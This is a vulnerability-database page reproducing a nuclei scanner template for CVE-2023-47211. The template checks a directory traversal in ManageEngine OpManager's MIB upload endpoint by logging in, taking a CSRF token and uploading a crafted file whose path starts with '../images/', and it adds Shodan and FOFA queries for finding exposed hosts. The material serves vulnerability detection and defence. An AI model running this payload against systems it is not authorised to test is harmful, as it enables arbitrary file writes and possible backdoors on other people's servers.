Lucene search
K

ManageEngine OpManager - Directory Traversal

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 162 Views

ManageEngine OpManager - Directory Traversal vulnerability allows arbitrary file creation via specially crafted HTTP reques

Related
Refs
Code
id: CVE-2023-47211

info:
  name: ManageEngine OpManager - Directory Traversal
  author: gy741
  severity: high
  description: |
    A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
  impact: |
    Unauthenticated attackers can write arbitrary files to the system via path traversal, potentially creating backdoors or compromising system integrity.
  remediation: |
    Update ManageEngine OpManager to version 12.7.259 or later.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47211
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
    cvss-score: 8.6
    cve-id: CVE-2023-47211
    cwe-id: CWE-22
    epss-score: 0.47024
    epss-percentile: 0.98688
    cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: zohocorp
    product: manageengine_firewall_analyzer
    shodan-query:
      - "http.title:\"OpManager Plus\""
      - http.title:"opmanager plus"
    fofa-query: title="opmanager plus"
    google-query: intitle:"opmanager plus"
  tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp,vuln

http:
  - raw:
      - |
        POST /two_factor_auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}

      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN


        IMPORTS
            enterprises
                FROM RFC1155-SMI;

        microsoft       OBJECT IDENTIFIER ::= { enterprises 311 }
        software        OBJECT IDENTIFIER ::= { microsoft 1 }
        systems         OBJECT IDENTIFIER ::= { software 1 }
        os              OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT       OBJECT IDENTIFIER ::= { os 1 }
        windows         OBJECT IDENTIFIER ::= { os 2 }
        workstation     OBJECT IDENTIFIER ::= { windowsNT 1 }
        server          OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc              OBJECT IDENTIFIER ::= { windowsNT 3 }

        END

        -----------------------------372334936941313273904263503262--

      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN


        IMPORTS
            enterprises
                FROM RFC1155-SMI;

        microsoft       OBJECT IDENTIFIER ::= { enterprises 311 }
        software        OBJECT IDENTIFIER ::= { microsoft 1 }
        systems         OBJECT IDENTIFIER ::= { software 1 }
        os              OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT       OBJECT IDENTIFIER ::= { os 1 }
        windows         OBJECT IDENTIFIER ::= { os 2 }
        workstation     OBJECT IDENTIFIER ::= { windowsNT 1 }
        server          OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc              OBJECT IDENTIFIER ::= { windowsNT 3 }

        END

        -----------------------------372334936941313273904263503262--

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "MIBFile with same name already exists")'
        condition: and

    extractors:
      - type: regex
        name: x_zcsrf_token
        group: 1
        part: header
        regex:
          - 'Set-Cookie: opmcsrfcookie=([^;]{50,})'
        internal: true
# digest: 4a0a00473045022100c41f6b9727c16b2ac2fe024a4711609142b90469db9e0489f7896e93671f994e022028d544bdfbbd4a18ce0454cfa22597f72dd3d9723805b6470af62f24a5f48db0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.18.6 - 9.1
EPSS0.47024
SSVC
162